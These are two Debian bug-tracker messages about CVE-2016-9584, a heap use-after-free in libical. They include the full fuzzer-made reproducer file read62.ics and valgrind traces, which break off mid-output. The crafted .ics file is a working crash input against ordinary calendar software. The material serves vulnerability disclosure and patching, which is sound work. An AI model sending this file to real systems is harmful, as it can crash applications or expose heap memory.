Bug#852034: libical: CVE-2016-9584: heap use-after-free
Hi Since it looks that http://www.openwall.com/lists/oss-security/2017/01/20/16 it's fine to attach the reproducer, attached is the original read62.ics from Augustin Mista. Regards, Salvatore BEGIN:VCALENDAR VERSION;a=;b="a","a";c="a","b":2.1 PRODID:b CALSCALE:c b;b=;b="a";a=: BEGIN:VTIMEZONE TZID;b="c","c";a="c","c":a LAST-MODIFIED:18640512T154526Z TZURL;b=;b=:×YÌw b;b="a": c;a="a","c";b="a": c: c: END:VTIMEZONE BEGIN:VEVENT DTSTAMP:18640509T123415Z UID:a CLASS;a=:PRIVATE GEO;c=:5.243332;-30.705524 LAST-MODIFIED:18640509T001303Z LOCATION;LANGUAGE="a";c="b","a":c ORGANIZER;DIR="3¥//×";SENT-BY="+//+GvF»";LANGUAGE="b";a="a":w//mºÃ PRIORITY:-3 SEQUENCE:-3 STATUS:CONFIRMED SUMMARY;ALTREP="h//o`R&^";LANGUAGE="c";b=;a="a","b":b TRANSP;a="a","b":TRANSPARENT URL;a=;a="b","c":H_õGD RECURRENCE-ID:18640510T142133 RRULE:FREQ=MINUTELY;BYSECOND=0,0;BYMINUTE=0;BYHOUR=0,0;BYDAY=0MO;BYMONTHDAY =0;BYYEARDAY=0,0,0;BYMONTH=0,0,0;BYSETPOS=0,0,0;WKST=SU RRULE;a=;c=:FREQ=HOURLY;COUNT=-2;INTERVAL=-2;BYSECOND=0,0;BYMINUTE=0,0;BYHO UR=0;BYDAY=0TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYMONTH=0,0;WKST=WE RRULE:FREQ=DAILY;BYMINUTE=0,0;BYDAY=MO;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEE KNO=0,0;BYSETPOS=0,0;WKST=TH RRULE;a=:FREQ=MONTHLY;COUNT=2;INTERVAL=2;BYMINUTE=0,0;BYYEARDAY=0;BYWEEKNO= 0,0;BYSETPOS=0;WKST=WE ATTACH:Nu//M ATTACH;FMTTYPE=application/b;a="c":E// ?OF ATTACH;b=;c=;VALUE=BINARY;ENCODING=BASE64:AAEA ATTENDEE;CUTYPE=RESOURCE;MEMBER=",//;ei ";ROLE="c";RSVP=TRUE;DELEGATED-TO=" L//N";DELEGATED-FROM="//R1","4//|sO"," //o[²";CN="a";DIR="WÍ//|<cm MD";a=;b="c":uK2 ATTENDEE;CUTYPE="c";MEMBER=" //xh5","RÓ//u7";ROLE=OPT-PARTICIPANT;PARTST AT=COMPLETED;RSVP=TRUE;DELEGATED-TO="s//·L w1","®,OÒ";DELEGATED-FROM=" ¤//3"1";SENT-BY="}//!@ ý_¯";CN="b";LANGUAGE="b";a="c","c";b="a"," b":n[//½2¡ CATEGORIES;LANGUAGE="b":a CATEGORIES;LANGUAGE="c":c COMMENT;ALTREP="gi//À?¨3o";c="b";b=:a COMMENT;a="c":c COMMENT;ALTREP="//üÏ]¡";a="b";c="a","a":c EXDATE;VALUE=DATE;a=;a="a": EXDATE;VALUE=DATE;a="a": REQUEST-STATUS;c=;a="a","c":0;c;c REQUEST-STATUS;LANGUAGE="a":0.0;a;a RELATED-TO;c="c","b";a=;RELTYPE="b":a RELATED-TO:c RDATE;VALUE=DATE;b="b";a="c","c":18640511 RDATE;VALUE=PERIOD;c=:18640509T110241/PT-1H1M1S BEGIN:VALARM ACTION;c="c","c";b="c":AUDIO TRIGGER;VALUE=DATE-TIME:18640511T160521Z REPEAT:1 DURATION;a=:-P-1W ATTACH;VALUE=BINARY;ENCODING=BASE64: c: END:VALARM BEGIN:VALARM ACTION:DISPLAY TRIGGER:PT1H-1M1S DESCRIPTION;ALTREP="//u";LANGUAGE="b";a=:a REPEAT:1 a;b=: c;c=: END:VALARM BEGIN:VALARM ACTION:EMAIL TRIGGER;a="b";VALUE=DATE-TIME:18640511T010525Z DESCRIPTION;ALTREP="L//";LANGUAGE="c":c SUMMARY;ALTREP="Õ//8";LANGUAGE="c":b ATTENDEE;CUTYPE=RESOURCE;ROLE=NON-PARTICIPANT;PARTSTAT=DELEGATED;RSVP=TRUE; DELEGATED-TO="//v",">s";SENT-BY="â";DIR="//j*"://ñ ATTENDEE;CUTYPE=GROUP;MEMBER="X";PARTSTAT="a";RSVP=TRUE;DELEGATED-TO="//« ","C//lz";DELEGATED-FROM="=//*-F";SENT-BY="h#";DIR="o//Ýl";LANGUAGE="a ":2//tk+ REPEAT:-1 DURATION:P1DT1H-1M-1S ATTACH;a=;VALUE=BINARY;ENCODING=BASE64:AQE= ATTACH;FMTTYPE=video/b;c=;VALUE=BINARY;ENCODING=BASE64:AQ== a;a=: b;b="b": a: END:VALARM b;b="a": b;a="c","c";c="a","c": END:VEVENT BEGIN:VEVENT DTSTAMP;a="a":18640508T112617Z UID;b="b";b="a":b DTSTART;TZID="a";b="b";a=:18640508T060217 CLASS;a="a":CONFIDENTIAL CREATED:18640508T060348Z DESCRIPTION;ALTREP="£";LANGUAGE="c";b="c":b GEO;a="a":-21.932919;0.126901 LAST-MODIFIED;a=:18640507T100353Z ORGANIZER;DIR=" ATTENDEE;CUTYPE="c";ROLE=OPT-PARTICIPANT;DELEGATED-FROM="// ";SENT-BY="cD ü";DIR="P//":O// REPEAT;c="c":-2 DURATION;b=:P0DT-1H-1M0S a;c="c": END:VALARM END:VEVENT BEGIN:VEVENT DTSTAMP;a=:18640508T231357Z UID;b=;c="b","a":a DTSTART;TZID="c";c="c","c";a=:18640507T212203 CLASS;b=:c CREATED;c=:18640507T224453Z DESCRIPTION;ALTREP="//A1r1";a="c","a":c GEO:2.636681;-2.271918 LAST-MODIFIED;c="c","c":18640506T095808Z LOCATION;b="c";b="b","a":b ORGANIZER;CN="a";DIR="VÿF";SENT-BY="c Óï";LANGUAGE="b";b="a";a="a" :t PRIORITY;a="c":0 SEQUENCE:-1 STATUS;a="a","a";b="c":CANCELLED TRANSP;b=;a="c":OPAQUE URL;b=;a="a":,//( RRULE;b="b","a":FREQ=MINUTELY;UNTIL=18640510T061434Z;INTERVAL=0;BYSECOND=0, 0;BYMINUTE=0,0;BYHOUR=0;BYDAY=MO,0TU,WE;BYMONTHDAY=0;BYYEARDAY=0,0;BYWEEKN O=0,0,0;BYSETPOS=0,0;WKST=TU RRULE;c="c","b";c="b":FREQ=MONTHLY;INTERVAL=-2;BYSECOND=0,0;BYHOUR=0;BYDAY= 0SA,0WE;BYMONTH=0;BYSETPOS=0,0 RRULE;c="a":FREQ=MONTHLY;BYMINUTE=0,0,0;BYDAY=TH,0FR;BYMONTHDAY=0,0,0;BYWEE KNO=0,0,0;BYMONTH=0,0;BYSETPOS=0;WKST=FR RRULE;c=:FREQ=YEARLY;COUNT=2;INTERVAL=-2;BYSECOND=0,0,0;BYHOUR=0,0,0;BYDAY= 0SA,TU,TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEEKNO=0,0;BYMONTH=0,0;BYSETPOS =0 ATTACH;FMTTYPE=c/b;b=;VALUE=BINARY;ENCODING=BASE64:AQA= ATTENDEE;CUTYPE=GROUP;MEMBER="eú//#åW'n","§ //[áêl4j";RSVP=TRUE;DELE GATED-TO="3\¾=";SENT-BY="_//V";CN="a";DIR="x//QZ:,";LANGUAGE="c";c="a" ,"a";c=://!g ATTENDEE;CUTYPE=ROOM;MEMBER="//zv^";ROLE=NON-PARTICIPANT;PARTSTAT=ACCEPTED;
Bug#852034: libical: CVE-2016-9584: heap use-after-free
Source: libical Version: 1.0-1.3 Severity: important Tags: security upstream Hi, the following vulnerability was published for libical. CVE-2016-9584[0]: | libical allows remote attackers to cause a denial of service | (use-after-free) and possibly read heap memory via a crafted ics file. The SuSE bugzilla entry contains a helper paerser which can be used to trigger the issue, with the read62.ics provided by Agustin Mista (but it is not public, and needs to be requested to Agustin Mista currently, should ideally be made public by the reporter though). The issue is then reproducible under valgrind with both 1.0-1.3 and 2.0.0-0.5. ==956== Memcheck, a memory error detector ==956== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==956== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info ==956== Command: ./icaltestparser ./read62.ics ==956== ==956== Invalid read of size 1 ==956==at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) ==956==by 0x50F3DA2: vfprintf (vfprintf.c:1637) ==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63) ==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34) ==956==by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AB75: icalcomponent_as_ical_string (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B95: main (icaltestparser.c:117) ==956== Address 0x849c2a4 is 4 bytes inside a block of size 66 free'd ==956==at 0x4C2CDDB: free (vg_replace_malloc.c:530) ==956==by 0x4E70059: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== Block was alloc'd at ==956==at 0x4C2DBC5: calloc (vg_replace_malloc.c:711) ==956==by 0x4E6E1AD: icalmemory_new_buffer (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E700A4: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== ==956== Invalid read of size 1 ==956==at 0x4C2EDB4: strlen (vg_replace_strmem.c:454) ==956==by 0x50F3DA2: vfprintf (vfprintf.c:1637) ==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63) ==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34) ==956==by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AB75: icalcomponent_as_ical_string (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B95: main (icaltestparser.c:117) ==956== Address 0x849c2a5 is 5 bytes inside a block of size 66 free'd ==956==at 0x4C2CDDB: free (vg_replace_malloc.c:530) ==956==by 0x4E70059: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== Block was alloc'd at ==956==at 0x4C2DBC5: calloc (vg_replace_malloc.c:711) ==956==by 0x4E6E1AD: icalmemory_new_buffer (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E700A4: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== ==956== Invalid read of size 1 ==956==at 0x4C330A8: __GI_mempcpy (vg_replace_strmem.c:1518) ==956==by 0x511FBFD: _IO_default_xsputn (genops.c:438) ==956==by 0x50F3BDA: vfprintf (vfprintf.c:1637) ==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63) ==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34) ==956==by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by